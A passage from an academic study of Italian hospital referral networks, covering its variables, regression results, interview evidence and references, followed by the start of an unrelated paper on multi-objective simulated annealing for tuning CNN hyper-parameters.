CONNECTIONS Because hospital and interhospital factors in a given year (rather than any prior year) are most relevant to the patient referral outcomes in that year, our dependent variable is not lagged. Independent variables Relational exclusivity First-order network coupling captures the extent to which organizations concentrate their relations to few partners rather than spread them out among many potential partners (Uzzi, 1996). Researchers have used first-order network coupling in various contexts, adapting it to the type of network at hand (see e.g. Shipilov, 2005; Shipilov et al., 2011). In a network of patient referrals, the measure captures the extent to which hospitals concentrate their referrals to few of the many potential partner hospitals. It is computed as ∑J j=1 P2 ij , where P ij is the fraction of hospital i’s total patient referral flow accounted by referrals to or from partner hospital j, and J is the count of partner hospitals in i’s referral network. When the measure is close to 0, the hospital spreads out its patient referral relations among many partner hospitals, without clearly preferring some over others. When the measure is at its extreme value of 1, the focal hospital has an exclusive referral relation with one partner. Complementarity of capabilities One hospital may complement another’s patient care capabilities by having clinical expertise or equipment that the other lacks. For example, when a hospital lacking an oncology unit refers a patient with cancer symptoms to one that specializes in oncology, the hospitals are leveraging their complementarity for patient benefit. In our context, such complementarity is measurably reflected in hospitals’ clinical speci alty profiles. The profile of the focal hospital is complementary with its referral partners to the extent that its partners lack its clinical specialties and it lacks theirs. This type of complementarity is captured by the Jaccard distance (one minus the ratio of overlapping specialties to all unique specialties that either partner has) between a hospital and its partner. Thus, we compute the measure of clinical complementarity as the average Jaccard distance between the focal hospital and all its partners. There are 53 clinical specialties represented in the sample. Control variables We included a set of control variables to minimize the threat of omitted variable bias. To account for larger hospitals’ greater capacity to benefit patients, we included the hospital size, expressed as the number of beds. The average number of beds among the focal hospital’s referral partner hospitals captures the same capacity in the hospital’s partnership network. We controlled for the hospital’s occupancy rate, to account for the possibly higher propensity to refer patients when the hospital has a shortage of available beds. Because we expect geographic proximity to affect both the patient benefits and the networks that the hospitals create, we controlled for the average geographic distance between the focal hospital and its referral partners, weighted by the total yearly patient flow between them. Furthermore, we controlled for the ownership form, distinguishing private from public hospitals, to account for private organizations’ higher propensity to focus on economic performance at the expense of client benefit (Hansmann, 1980; Baum et al., 2000). The hospital attributes in our model that are potentially related to patient benefit from referrals include the total number of referral patients that the hospital sent and received in the given year, the case mix index (INHS’s standard measure of the complexity of the cases treated by the hospital), and the com- parative performance index (CPI). The CPI is the annual hospital efficiency score, computed annually by the regional division of the INHS. The CPI captures the relative time that it takes the hospital to successfully treat cases of similar complexity. The index takes the value of 1 for hospitals whose performance is average compared with other hospitals in the region. It is below (above) 1 if the hospital performs above (below) the regional average. We also controlled for the RSRR in the focal hospital. This control is essential because hospitals with a higher readmission rate (i.e. those that provide less effective treatment) are by design more likely to benefit patients when they refer them to another hospital and less likely to do so when they receive referred patients. Table 1 shows the measures’ descriptive statis- tics and correlation matrix. All control variables except the number of referrals made and received are significantly correlated with the dependent variable and at least one main independent variable; exclusion of these variables would therefore subject the model to omitted variable bias. Results Are patients referred to hospitals providing better care? Before examining the determinants of patient refe- rral to hospitals providing better care, it is instructive 38 Clients’ outcomes from providers’ networks T a b le 1 . V a ri a b le s in t h e a n a ly si s: d e sc ri p ti ve s ta ti st ic s a n d t h e c o rr e la ti o n m a tr ix . V a ri a b le M S D 1 2 3 4 5 6 7 8 9 1 0 1 1 1 2 1 . P at ie n t b en ef it − 1 .3 8 6 .5 4 2 . B ed s in f o ca l h o sp ita l 2 0 5 .9 2 7 1 .5 − 0 .4 3 ** 3 . A ve ra g e b ed s in p ar tn er h o sp ita ls 3 9 8 .3 1 9 1 .9 − 0 .1 2 ** − 0 .0 6 4 . O cc u p an cy r at e 0 .6 9 0 .2 1 − 0 .1 8 ** 0 .3 0 ** − 0 .0 3 5 . A ve ra g e d is ta n ce t o p ar tn er s (k m ) 2 1 .8 6 1 6 .1 5 − 0 .1 5 ** 0 .1 1 * 0 .0 1 0 .1 8 ** 6 . P riv at e h o sp ita l 0 .4 6 0 .5 0 0 .1 8 ** − 0 .2 5 ** 0 .0 3 − 0 .2 4 ** − 0 .4 1 ** 7 . R ef er ra l p at ie n ts s en t in ye ar 1 5 3 .7 2 2 5 .4 − 0 .0 3 0 .5 2 ** − 0 .1 3 ** 0 .4 0 ** 0 .0 3 − 0 .3 0 ** 8 . R ef er ra l p at ie n ts re ce iv ed in y ea r 1 5 3 .7 2 1 8 .1 − 0 .0 2 0 .6 2 ** − 0 .0 9 0 .3 0 ** − 0 .0 6 − 0 .0 3 0 .4 5 ** 9 . C as e m ix in d ex 0 .8 9 0 .9 7 − 0 .3 4 ** 0 .2 7 ** 0 .0 2 0 .0 2 − 0 .1 0 0 .1 2 * − 0 .0 4 0 .3 0 ** 1 0 . C o m p ar at iv e p er fo rm an ce in d ex 1 .0 0 0 .1 9 − 0 .1 2 * 0 .1 9 ** 0 .0 7 0 .1 6 ** 0 .0 0 1 − 0 .2 3 ** . 0 .1 4 ** − 0 .0 1 0 .0 2 1 1 . R is k- st an d ar d iz ed re ad m is si o n r at e 0 .0 3 0 .0 4 − 0 .3 7 ** 0 .1 9 ** 0 .0 2 0 .0 4 − 0 .0 2 − 0 .1 0 ** − 0 .0 2 0 .0 7 0 .2 5 ** 0 .1 5 ** 1 2 . C lin ic al c o m p le - m en ta rit y w ith p ar tn er s 0 .3 7 0 .2 2 − 0 .2 0 ** 0 .5 3 ** − 0 .2 5 ** 0 .3 5 ** − 0 .0 8 − 0 .2 5 ** 0 .3 6 ** 0 .4 7 ** 0 .1 5 ** 0 .1 0 0 .4 3 ** 1 3 . R el at io n al e xc lu si vi ty 0 .2 4 0 .2 3 0 .1 6 ** − 0 .3 7 ** 0 .0 9 − 0 .2 5 ** − 0 .1 6 ** 0 .3 0 ** − 0 .1 0 − 0 .0 3 0 .4 5 ** − 0 .4 0 ** − 0 .0 4 * − 0 .1 8 ** N o te s: N = 3 9 0 h o sp ita l- ye ar s w ith n o n -m is si n g d at a. C as es a re m is si n g w h en h o sp ita ls n ei th er s en d n o r re ce iv e re fe rr ed p at ie n ts . *p < 0 .0 5 ;* *p < 0 .0 1 . 39 CONNECTIONS to see how commonly patients get routed toward higher- or lower-quality hospitals. The numbers in Table 2 confirm that patient referral is not optimized to care quality in our setting, a pattern already noted in various patient referral networks (Bosk et al., 2011; Hains et al., 2011; Veinot et al., 2012). In every year within our observation period, a patient was slightly more likely to be referred to a hospital with a higher (worse) RSRR compared to the sending hospital than to a hospital with a lower readmission rate. The same tendency is evidenced by the negative mean of the patient benefit variable. Care quality improvement is thus clearly not a guaranteed outcome of patient referral in our setting, but rather a contingent feature dependent on partner hospitals involved. The effect of relational exclusivity Table 3 reports the results of the multivariate analysis of patient referral to hospitals with better care quality (lower readmission rate). Model 1 includes only the control variables. It has good predictive power, largely because the amount of benefit or harm a hospital (or any organization) can create is a function of its size, captured by the bed count and patient flow variables. In Model 2, we add the measure of relational exclusivity. The model tests the notion that hospitals whose patient referral relations tend to be concentrated to few partners − rather than spread among many partners − create more benefit to their referral patients. The fit of the model significantly improved relative to Model 1, and R2 increased to 0.54. The effect of the added variable is large and positive, supporting H1. The effect of interaction of relational exclusivity and clinical complementarity Model 3 includes the interaction term of clinical complementarity with relational exclusivity. The interaction effect is large, positive, and significant. Consistent with H2, this result shows that clinical complementarity amplifies the effect of relational exclusivity. Remarkably, it is only due to hospitals’ leveraging of clinical complementarity that this effect attains significance in Model 2. The non-significant main effect of relational exclusivity in Model 3 affirms that, at low levels of complementarity, the prediction of H1 does not hold. In other words, when partner hospitals have few complementary capabilities to be aware of and to act upon, relational exclusivity produces no significant patient benefit. On the other hand, the negative and significant main effect of clinical complementarity attests that, at low levels of relational exclusivity, hospitals that are highly complementary with their partners tend to refer patients into inferior care conditions. It is only at higher levels of relational exclusivity that clinical complementarity helps hospitals refer patients toward better care. Figure 2 visualizes the moderating effect of clinical complementarity in Model 3. The vertical axis shows the effect of relational exclusivity on patient benefit at every level of clinical complementarity. The lowest value of this effect is 5.37, which corresponds to the main effect of relational exclusivity. The effect increases as clinical complementarity increases, reaching significance at p = 0.05 beyond the 10th percentile of clinical complementarity. Table 2. The flow of referral patients by year and relative risk-standardized readmission rate. Patients referred to hospitals where readmission rate is Year lower (better) than in sending hospital higher (worse) than in sending hospital same as in sending hospital 2006 8,524 9,454 153 2007 7,793 8,696 0 2008 7,670 7,869 0 2009 7,219 7,599 566 Total 31,206 33,618 719 40 Clients’ outcomes from providers’ networks Table 3. Effect of relational exclusivity on patient referral to hospitals with better care quality. Linear regression models with two-dimensional clustering of standard errors Model 1 Model 2 Model 3 Beds in focal hospital −0.02** (0.004) −0.02** (0.003) −0.01** (0.003) Average beds in referral partner hospitals −0.004* (0.002) −0.003 (0.002) −0.004* (0.002) Occupancy rate −5.42** (1.86) −3.82* (1.57) −4.11* (1.71) Average weighted distance to partners (km) −0.01 (0.02) −0.01 (0.02) −0.01 (0.02) Private hospital 0.31 (0.90) 0.17 (0.85) −0.23 (0.83) Case mix index −1.66** (0.58) −2.74** (0.72) −2.73** (0.70) Comparative performance index 2.19 (1.61) 5.04** (1.91) 5.02* (2.00) Referral patients sent in year <0.01 (<0.01) <0.01 (<0.01) <0.01 (<0.01) Referral patients received in year 0.02** (<0.01) 0.02** (<0.01) 0.01** (<0.01) Risk-standardized readmission rate −37.75** (13.93) −34.66* (16.45) −34.31* (16.08) Clinical complementarity with partners ≤0.01 (2.73) −8.95** (3.33) Relational exclusivity 15.18** (4.26) 5.37 (4.20) Clinical complementarity with partners × Relational exclusivity 42.58** (14.05) N 390 390 390 R2 0.50 0.54 0.58 LR χ2 (relative to previous model) − 36.70** 28.95** Notes: Standard errors, clustered by hospital and year, are in parentheses. The unit of analysis is hospital-year. The intercept is omitted.*p < 0.05; **p < 0.01. Supplementary analyses We performed supplementary analyses to examine two types of potential threat to the validity of our results. First, we checked the robustness of our quantitative findings. Second, we examined the transcripts of our interviews with health care professionals to confirm that they understand the main concepts that we measured and consider them when making patient referral decisions. Robustness checks Because the positive effect of relational exclusivity on organizational outcomes has been shown to peak at an optimal level and then decline (Uzzi, 1996), we examined if our linear specification of this effect was warranted. We tried adding the quadratic term to Model 2. The quadratic term had no significant effect, and we omitted it. We also experimented with adding the quadratic term and its interaction term with clinical complementarity to Model 3. The added terms created multicollinearity and did not improve the fit of Model 3. The interaction of the quadratic term with clinical complementarity was not significant. We also re-estimated Models 2 and 3 with the added variable measuring hospitals’ degree of specialization, a Herfindahl index summing the squared shares of beds allocated to each clinical specialty. Because more specialized hospitals tend to have more exclusive referral relations, models might have confounded the effects of specialization and exclusivity. With the Herfindahl index included in Models 2 and 3, both hypothesized effects retained their size and significance. The index had no significant effect, did not improve the model fit 41 CONNECTIONS and removed nine observations because of missing specialization data. The results reported in Table 3 are remarkably robust to model specification. We reproduced both hypothesized effects in models with fixed hospital and year effects, with correction for clustering on one variable (year or hospital) only, with the Huber−White correction, and with uncorrected random effects. We also reproduced all effects when the sample was restricted to hospital partnerships where patient benefit values were positive. All results of robustness checks are available on request. Relational exclusivity and complementary capabilities in health professionals’ accounts We used the transcripts of our interviews with health care professionals to verify that physicians and hospital administrators understand and use − at everyday, common-sense level − the concepts that we theorized and measured. Our 17 semi-structured interviews preceded the rest of our work on this study and were not intended to bear on its arguments. The objective of the interviews was to elicit first-hand accounts of why and how hospitals refer patients. Because we used a convenience sample, the data enable no robust causal inference. Nevertheless, the interview evidence added confidence that decision makers in hospitals understand relational exclusivity and complementary capabilities and consider them in making patient referrals. Every respondent in our sample was asked “Why does your hospital refer patients to other hospitals?” Additional unscripted follow-up questions were asked to elicit extended answers to this question. Some follow-up questions were asked by email and answers were appended to the transcripts. Our respondents, physicians and administrators alike, showed awareness of the role of relational exclusivity. In accordance with our hypotheses, they attested that exclusive relations help hospitals leverage knowledge of mutual complementary capabilities for patient benefit. A physician said: There are a few hospitals that [together] send us […] 60 to 70 percent of the [referral] patients [we receive]. […] Apart from geography, [we prefer these hospitals because] they know what we can do for their patients. And, of course, we send our patients to these hospitals whenever needed4. He proceeded to explain that exchange of patients with such frequent partner hospitals is easier because 4All interview quotes are translated from Italian. Figure 2: The marginal effect of relational exclusivity across the range of the clinical complementarity variable. Note: The 95% confidence interval shown in grey. The line is thicker where the marginal effect is different from zero at p < 0.05. 42 Clients’ outcomes from providers’ networks information about what the partner can do for the patient can be more effectively communicated: In some instances […[ a phone call of 20 minutes is enough [to finalize a patient referral]. […] [Such quick decision making] has to do with […] knowledge about resources […] and administrative procedures. Previous interaction helps us accumulate such precious knowledge. The administrative director of a large children’s hospital similarly pointed out that procedural know- ledge among frequent referral partners helps the efficiency of the referral: Hospitals that send patients more regularly, or with which we have been in touch for a long time, are very good in sending us the right material that lets us fully understand [how we can help with] the clinical case. […] There are partners who know very well what we want to see in their referral requests. And this is not strictly related to the type of patient to be transferred, but rather it is about how they present their request and about the completeness of information. A physician in a major teaching hospital suggested that exclusive relations may not only create aware- ness of complementary care capabilities, but also the confidence that the partner will make these capabilities available when requested: I remember a patient with lung cancer who […] developed an infection. We have no clinical ward for infection diseases at our hospital, so we decided to transfer the patient. […] We chose [hospital X] as partner because they have a good infectious disease department. […] I know they have the expertise and have never refused to receive a patient [from us]. Finally, we noted that awareness of complemen- tary capabilities may motivate hospitals not only to send but also to receive referral patients. A physician reported that his hospital “primarily accepts patients coming from another hospital because we have better ability to treat their diseases.” Discussion Contributions and future directions Under what conditions do clients benefit from providers’ partnership networks? Our answer builds on the idea that client benefits ensue from providers’ ego-network features that enable the use of mutually complementary capabilities to deliver higher-quality client service. We argued that relational exclusivity improves the providers’ knowledge and use of network partners’ complementary capabilities and thereby helps clients benefit from providers’ network relations. We hypothesized that organizations will be more likely to know their partners’ capabilities and put this knowledge to work for the benefit of the client to the extent that their relations are concentrated among few selected partners. The analysis supported this hypothesis. We also found that the hypothesized effect strengthens as the complementarity of providers’ client service capabilities increases, which supports the notion that relational exclusivity facilitates the use of such capabilities for client benefit. Our argument and findings offer two contributions to organizational network theory. First, we offer early evidence that configurations of providers’ networks may not only benefit organizations, as previous network studies amply confirmed, but also deliver benefits to organizations’ clients. Second, our study transcends the notion that providers’ networks benefit clients when providers are motivated to serve client needs. We point out that motivation cannot fully account for clients’ benefits from providers’ networks and advocate a theoretical account that embraces the role of providers’ network features that unlock their client service capabilities. These contributions hold out a promise of a fruitful research program examining network features that make providers more or less capable of serving client needs. We start and encourage this research effort. As the emerging literature on clients’ benefits from organizational networks matures, it may fruitfully mirror the earlier theoretical and empirical development of the literature on organizations’ benefits from networks. Two pathways in this development have been particularly rich in insight. First, research moved from examining the main effects of having ties (Mizruchi and Stearns, 1994; Uzzi, 1996; Gulati, 1998) toward contingent theories examining the benefits and drawbacks of networks depending on external environments and tasks at hand (Gulati and Higgins, 2003; Fleming et al., 2007). Second, studies progressed from focusing on the effects of network structures (Coleman et al., 1957; Granovetter, 1985) toward examining the content of network relations (e.g. Emirbayer and Goodwin, 1994). Both pathways remain largely untrodden in research on clients’ benefits. Future studies may examine how client benefits from networks are contingent on the intensity of competition among providers and on whether providers are for-profit or nonprofit. They may further consider how the structural effects are modified by cross-cultural variation in network relations’ content and by power inequalities between partners. We see our methodological contribution in encou- raging network research to capture the effects of 43 CONNECTIONS interorganizational relations directly, rather than infer such effects from relationships between network variables and outcome variables. Our method highlights the distinction between, on the one hand, capturing whether providers refer clients to network partners who offer better-quality service and, on the other hand, examining the correlation between a provider’s ego-network properties and its clients’ outcomes. In the former case, we can say with confidence that we are observing a relational effect: the client was served by a better- quality provider because of the cooperation between specific providers in the network. In the latter case, we cannot rule out that the correlation exists due to unmeasured provider properties that simultaneously affect its networks and client outcomes, such as financial or other resources. Similar distinctions apply in all studies of relational outcomes, where only an unmistaken linkage between a relation and its outcomes can safeguard against spurious network effects. Practical implications Our argument suggests that service recipients’ outcomes may be improved by structuring providers’ network ties in ways that promote the coordinated use of providers’ service capabilities. This opens new ways of improving health care outcomes, particularly by countering the adverse effects of care fragmentation. Research has shown that patients are disadvantaged when patient care is spread across poorly coordinated providers and examined the merits of anti-fragmentation policies aimed at internalizing the care within formally organized groups of providers (Agha et al., 2017). Our study suggests that promotion of preferred provider-to-provider direct partnerships, rather than organized provider groups, may be a viable alternative anti-fragmentation policy. Generalizability and limitations We advocate caution in generalizing our argument or empirical results. This is not because there are evident reasons why relational exclusivity should fail to produce the hypothesized effects beyond health care, or beyond professional services, but because these reasons are largely unexplored. While a close examination of these reasons is beyond our scope, three conditions seem particularly likely to restrict the generalizability of our argument. First, we expect relational exclusivity to generate client benefits only in settings where providers’ capabilities are differentiated. If providers have identical capabilities, their potential to improve products or services by partnering is limited. Indeed, as our analysis just showed, network mechanisms generate no patient benefits in hospitals whose network partners have similar service capabilities. Second, our argument depends on the presence of motivation to deliver good client service. Whichever client benefit potential provider networks may create, providers who lack all motivation to deliver good outcomes to clients − most typically in markets with limited competition − will not realize that potential. Third, the argument only applies when providers partner in matters of serving client needs. We do not theorize any client outcomes from partnerships established for other purposes, such as joint lobbying or acting against common competitors. A variety of professional services meets the triple scope condition of differentiation, client service motivation, and partnering in matters of service. Beside health care, the three conditions are most reliably met in postsecondary education, accounting services, legal aid and venture capital − which all happen to be fields where, similar to health care, referrals of clients (or, in case of education, students) across organizations are common. In contrast, wholesaling commodity producers are not differentiated in capabilities relevant to end-consumer experience and thus fail to meet the first condition. Normally, however, we do not expect the presence or absence of any of the three conditions to be a binary contrast, but rather a matter of degree. In most contexts, a dedicated empirical investigation is required to determine whether the scope conditions are sufficiently met for our argument to apply. Our study has a number of methodological limitations. First, our empirical scope is limited to a local health care system. While health care has obvious institutional idiosyncrasies, the problem of how collaboration among organizations may benefit their customers remains general. Our design would benefit from replication in different contexts, with measures of customer outcomes tailored to the context at hand. Second, our measures of care quality are coarser than we would have liked. With fine-grained, preferably patient-level health data, we would be able to go beyond hospital-centered measures such as RSRR and examine transaction- level factors that affect patient outcomes. While access to patient-level information is difficult due to privacy concerns, such information may validate and improve the results of our study. Third, referrals are one of many types of interorganizational collaboration that may be potentially consequential for client benefit. We trust that future research will build on 44 Clients’ outcomes from providers’ networks our arguments and analysis and will examine the implications of other types of interorganizational collaboration for client benefit. References Agha, L., Frandsen, B. and Rebitzer, J. B. 2017. Causes and consequences of fragmented care delivery: theory, evidence, and public policy. Working Paper No. 23078, National Bureau of Economic Research, Cambridge, MA. Axon, R. N. and Williams, M. V. 2011. Hospital readmission as an accountability measure. JAMA: The Journal of the American Medical Association 305: 504–505. Baker, W. E. and Faulkner, R. R. 1993. The social organization of conspiracy: illegal networks in the heavy electrical equipment industry. American Sociological Review 58: 837–860. Barrera, D. and van de Bunt, G. G. 2009. Learning to trust: networks effects through time. European Sociological Review 25: 709–721. Barretta, A. 2008. The functioning of co-opetition in the health-care sector: an explorative analysis. Scandinavian Journal of Management 24: 209–220. Baum, J. A., Calabrese, T. and Silverman, B. S. 2000. Don’t go it alone: alliance network composition and startups’ performance in Canadian biotechnology. Strategic Management Journal 21: 267–294. Baum, J. A. C., Cowan, R. and Jonard, N. 2014. Does evidence of network effects on firm performance in pooled cross-section support prescriptions for network strategy?. Strategic Management Journal 35: 652–667. Boies, J. L. 1989. Money, business, and the state: material interests, Fortune 500 corporations, and the size of political action committees. American Sociological Review 54: 821–833. Borgatti, S. P. and Halgin, D. S. 2011. On network theory. Organization Science 22: 1168–1181. Bosk, E. A., Veinot, T. and Iwashyna, T. J. 2011. Which patients, and where: a qualitative study of patient transfers from community hospitals. Medical Care 49: 592–598. Boulding, W., Glickman, S. W., Manary, M. P., Schulman, K. A. and Staelin, R. 2011. Relationship between patient satisfaction with inpatient care and hospital readmission within 30 days. American Journal of Managed Care 17: 41–48. Brueckner, J. K. and Whalen, W. T. 2000. The price effects of international airline alliances. Journal of Law and Economics 43: 503–546. Bunderson, J. S. and Thompson, J. A. 2009. The call of the wild: zookeepers, callings, and the double- edged sword of deeply meaningful work. Administrative Science Quarterly 54: 32–57. Cameron, A. C., Gelbach, J. B. and Miller, D. L. 2012. Robust inference with multiway clustering. Journal of Business and Economic Statistics 29: 238–249. Centers for Medicare and Medicaid Services 2016. Re- admission measures. available at: https://www.qualitynet. org/inpatient/measures/readmission (accessed July 2, 2019). Cohen, M. D. and Hilligoss, P. B. 2010. The published literature on handoffs in hospitals: deficiencies identified in an extensive review. BMJ Quality & Safety 19: 493–497. Coleman, E. A., Parry, C., Chalmers, S. and Min, S. J. 2006. The care transitions intervention: results of a randomized controlled trial. Archives of Internal Medicine 166: 1822–1828. Coleman, J., Katz, E. and Menzel, H. 1957. The diffusion of an innovation among physicians. Sociometry 20: 253–270. DiBenigno, J. and Kellogg, K. C. 2014. Beyond occu- pational differences: the importance of cross-cutting de- mographics and dyadic toolkits for collaboration in a U.S. hospital. Administrative Science Quarterly 59: 375–408. Drange, I. 2013. Early-career income trajectories among physicians and dentists: the significance of ethnicity. European Sociological Review 29: 346–358. Durand, R. and McGuire, J. 2005. Legitimating agencies in the face of selection: the case of AACSB. Organization Studies 26: 165–196. Emirbayer, M. and Goodwin, J. 1994. Network analysis, culture, and the problem of agency. American Journal of Sociology 99: 1411–1454. Fleming, L., Mingo, S. and Chen, D. 2007. Collaborative brokerage, generative creativity, and creative success. Administrative Science Quarterly 52: 443–475. Gittell, J. H. and Weiss, L. 2004. Coordination networks within and across organizations: a multi-level framework. Journal of Management Studies 41: 127–153. Granovetter, M. 1985. Economic action and social structure: the problem of embeddedness. American Journal of Sociology 91: 481–510. Gravelle, H. and Waterson, M. 1993. No win, no fee: some economics of contingent legal fees. The Economic Journal 103: 1205–1220. Grier, K. B., Munger, M. C. and Roberts, B. E. 1991. The industrial organization of corporate political participation. Southern Economic Journal 57: 727–738. Gulati, R. 1995. Does familiarity breed trust? The implications of repeated ties for contractual choice in alliances. Academy of Management Journal 38: 85–112. Gulati, R. 1998. Alliances and networks. Strategic Management Journal 19: 293–317. Gulati, R. and Higgins, M. C. 2003. Which ties matter when? The contingent effects of interorganizational partnerships on IPO success. Strategic Management Journal 24: 127–144. Hains, I. M., Marks, A., Georgiou, A. and Westbrook, J. I. 2011. Non-emergency patient transport: what are 45 CONNECTIONS the quality and safety issues? A systematic review. International Journal for Quality in Health Care 23: 68–75. Halfon, P., Eggli, Y., Prêtre-Rohrbach, I., Meylan, D., Marazzi, A. and Burnand, B. 2006. Validation of the potentially avoidable hospital readmission rate as a routine indicator of the quality of hospital care. Medical Care 44: 972–981. Hansmann, H. 1980. The role of nonprofit enterprise. Yale Law Review 89: 835–901. Hochberg, Y. V., Ljungqvist, A. and Lu, Y. 2007. Whom you know matters: venture capital networks and investment performance. Journal of Finance 62: 251–301. Horwitz, L., Partovian, C., Lin, Z., Herrin, J., Grady, J., Conover, M., Montague, J., Dillaway, C., Bartczak, K., Suter, L., Ross, J., Bernheim, S., Krumholz, H. and Drye, E. 2012. Hospital-wide all-cause unplanned readmission measure. Technical report prepared for the Centers for Medicare & Medicaid Services. Ingram, P. and Roberts, P. W. 2000. Friendships among competitors in the Sydney hotel industry. American Journal of Sociology 106: 387–423. Iwashyna, T. J. and Courey, A. J. 2011. Guided transfer of critically ill patients: where patients are transferred can be an informed choice. Current Opinion in Critical Care 17: 641–647. Iwashyna, T. J., Christie, J. D., Moody, J., Kahn, J. M. and Asch, D. A. 2009. The structure of critical care transfer networks. Medical Care 47: 787–793. Kogut, B. and Zander, U. 1992. Knowledge of the firm, combinative capabilities, and the replication of technology. Organization Science 3: 383–397. Landrum, L. and Weinrich, S. 2006. Readmission data for outcomes measurement: identifying and strengthening the empirical base. Quality Management in Healthcare 15: 83–95. Leana, C., Appelbaum, E. and Shevchuk, I. 2009. Work process and quality of care in early childhood education: the role of job crafting. Academy of Management Journal 52: 1169–1192. Levin, D. Z. and Cross, R. 2004. The strength of weak ties you can trust: the mediating role of trust in effective knowledge transfer. Management Science 50: 1477–1490. Lomi, A., Mascia, D., Vu, D. Q., Pallotti, F., Conaldi, G. and Iwashyna, T. J. 2014. Quality of care and interhospital collaboration: a study of patient transfers in Italy. Medical Care 52: 407–414. Lomi, A. and Pallotti, F. 2012. Relational collabo- ration among spatial multipoint competitors. Social Networks 34: 101–111. Lui, S. S. and Ngo, H. Y. 2004. The role of trust and contractual safeguards on cooperation in non-equity alliances. Journal of Management 30: 471–485. Marrocu, E., Balia, S. and Brau, R. 2016. A spatial analysis of inter-regional patient mobility in Italy. ERSA Conference Paper No. ersa16p127, European Regional Science Association Louvain-la-Neuve, Belgium. Mayer, R. C., Davis, J. H. and Schoorman, F. D. 1995. An integrative model of organizational trust. Academy of Management Review 20: 709–734. Mizruchi, M. S and Stearns, L. B. 1994. A longitudinal study of borrowing by large American corporations. Administrative Science Quarterly 39: 118–140. Moody, J. and White, D. R. 2003. Structural cohesion and embeddedness: a hierarchical concept of social groups. American Sociological Review 68: 103–127. Morrish, S. C. and Hamilton, R. T. 2002. Airline alliances − who benefits?. Journal of Air Transport Management 8: 401–407. Ozmel, U., Yavuz, D., Trombley, T. and Gulati, R. 2020. Interfirm ties between ventures and limited part- ners of venture capital funds: Performance effects in financial markets. Organization Science (Forthcoming). Pahnke, E. C., McDonald, R., Wang, D. and Hallen, B. 2015. Exposed: venture capital, competitor ties, and entrepreneurial innovation. Academy of Management Journal 58: 1334–1360. Patterson, E. S. 2008. Structuring flexibility: The potential good, bad and ugly in standardisation of hand- overs. Quality and Safety in Health Care 17: 4–5. Petersen, M. A. 2009. Estimating standard errors in finance panel data sets: comparing approaches. Review of Financial Studies 22: 435–480. Powell, W. W., Koput, K. W., Smith-Doerr, L. and Owen-Smith, J. 1999. Network position and firm performance: organizational returns to collaboration in the biotechnology industry. Research in the Sociology of Organizations 16: 129–159. Provan, K. G. and Milward, H. B. 1995. A preliminary theory of interorganizational network effectiveness: a comparative study of four community mental health systems. Administrative Science Quarterly 40: 1–33. Rau, P. R. 2000. Investment bank market share, contingent fee payments, and the performance of acquiring firms. Journal of Financial Economics 56: 293–324. Rotemberg, J. J. and Saloner, G. 1990. Collusive price leadership. The Journal of Industrial Economics 1: 93–111. Rowley, T., Behrens, D. and Krackhardt, D. 2000. Redundant governance structures: an analysis of structural and relational embeddedness in the steel and semiconductor industries. Strategic Management Journal 21: 369–386. Ruef, M. and Scott, W. R. 1998. A multidimensional model of organizational legitimacy: hospital survival in changing institutional environments. Administrative Science Quarterly 43: 877–904. Schoonhoven, C. B. 1981. Problems with contingency theory: testing assumptions hidden within the language of contingency theory. Administrative Science Quarterly 26: 349–377. Shipilov, A. V. 2005. Should you bank on your network? Relational and positional embeddedness in the making of financial capital. Strategic Organization 3: 279–309. 46 Clients’ outcomes from providers’ networks Shipilov, A. V., Li, S. X. and Baum, J. A. 2011. A matching theory of embedded interfirm tie formation. Academy of Management Proceedings. Smith., A. 1776/1991. An Inquiry into the Nature and Causes of the Wealth of Nations Everyman’s Library, New York, NY, London and Toronto. Soda, G. 2011. The management of firms’ alliance network positioning: implications for innovation. European Management Journal 29: 377–388. Szulanski, G. 1996. Exploring internal stickiness: Impediments to the transfer of best practice within the firm. Strategic Management Journal 17: 27–43. Tan, J., Zhang, H. and Wang, L. 2015. Network closure or structural hole? the conditioning effects of network-level social capital on innovation performance. Entrepreneurship Theory and Practice 39: 1189–1212. Thompson, S. 2011. Simple formulas for standard errors that cluster by both firm and time. Journal of Financial Economics 99: 1–10. Uzzi, B. 1996. The sources and consequences of embeddedness for the economic performance of or- ganizations: the network effect. American Sociological Review 61: 674–698. Uzzi, B. 1997. Social structure and competition in interfirm networks: the paradox of embeddedness. Administrative Science Quarterly 42: 35–67. Uzzi, B. and Gillespie, J. J. 2002. Knowledge spillover in corporate financing networks: embeddedness and the firm’s debt performance. Strategic Management Journal 23: 595–618. Uzzi, B. and Lancaster, R. 2003. Relational embeddedness and learning: the case of bank loan managers and their clients. Management Science 49: 383–399. Veinot, T. C., Bosk, E. A., Unnikrishnan, K. P. and Iwashyna, T. J. 2012. Revenue, relationships and routines: the social organization of acute myocardial infarction patient transfers in the United States. Social Science and Medicine 75: 1800–1810. Wrzesniewski, A., McCauley, C., Rozin, P. and Schwartz, B. 1997. Jobs, careers, and callings: People’s relations to their work. Journal of Research in Personality 31: 21–33. Wuyts, S., Rindfleisch, A. and Citrin, A. 2015. Outsourcing customer support: The role of provider customer focus. Journal of Operations Management 35: 40–55. Zaheer, A. and Venkatraman, N. 1995. Rel- ational governance as an interorganizational strategy: an empirical test of the role of trust in economic exchange. Strategic Management Journal 16: 373– 392. work_4tui5szsfzgg5pmnwcq4aw3mwi ---- Multi-objective simulated annealing for hyper-parameter optimization in convolutional neural networks Multi-objective simulated annealing for hyper-parameter optimization in convolutional neural networks Ayla Gülcü and Zeki Kuş Computer Science, Fatih Sultan Mehmet University, Istanbul, Turkey ABSTRACT In this study, we model a CNN hyper-parameter optimization problem as a bi-criteria optimization problem, where the first objective being the classification accuracy and the second objective being the computational complexity which is measured in terms of the number of floating point operations. For this bi-criteria optimization problem, we develop a Multi-Objective Simulated Annealing (MOSA) algorithm for obtaining high-quality solutions in terms of both objectives. CIFAR-10 is selected as the benchmark dataset, and the MOSA trade-off fronts obtained for this dataset are compared to the fronts generated by a single-objective Simulated Annealing (SA) algorithm with respect to several front evaluation metrics such as generational distance, spacing and spread. The comparison results suggest that the MOSA algorithm is able to search the objective space more effectively than the SA method. For each of these methods, some front solutions are selected for longer training in order to see their actual performance on the original test set. Again, the results state that the MOSA performs better than the SA under multi-objective setting. The performance of the MOSA configurations are also compared to other search generated and human designed state-of-the-art architectures. It is shown that the network configurations generated by the MOSA are not dominated by those architectures, and the proposed method can be of great use when the computational complexity is as important as the test accuracy. Subjects Artificial Intelligence, Computer Vision Keywords Multi-objective, Simulated annealing, Convolutional neural networks, Hyper-parameter optimization INTRODUCTION Convolutional Neural Networks (CNNs) differ from multi-layer perceptron models with the use of convolution operators instead of matrix multiplications in at least one of its layers (LeCun et al., 1990; LeCun 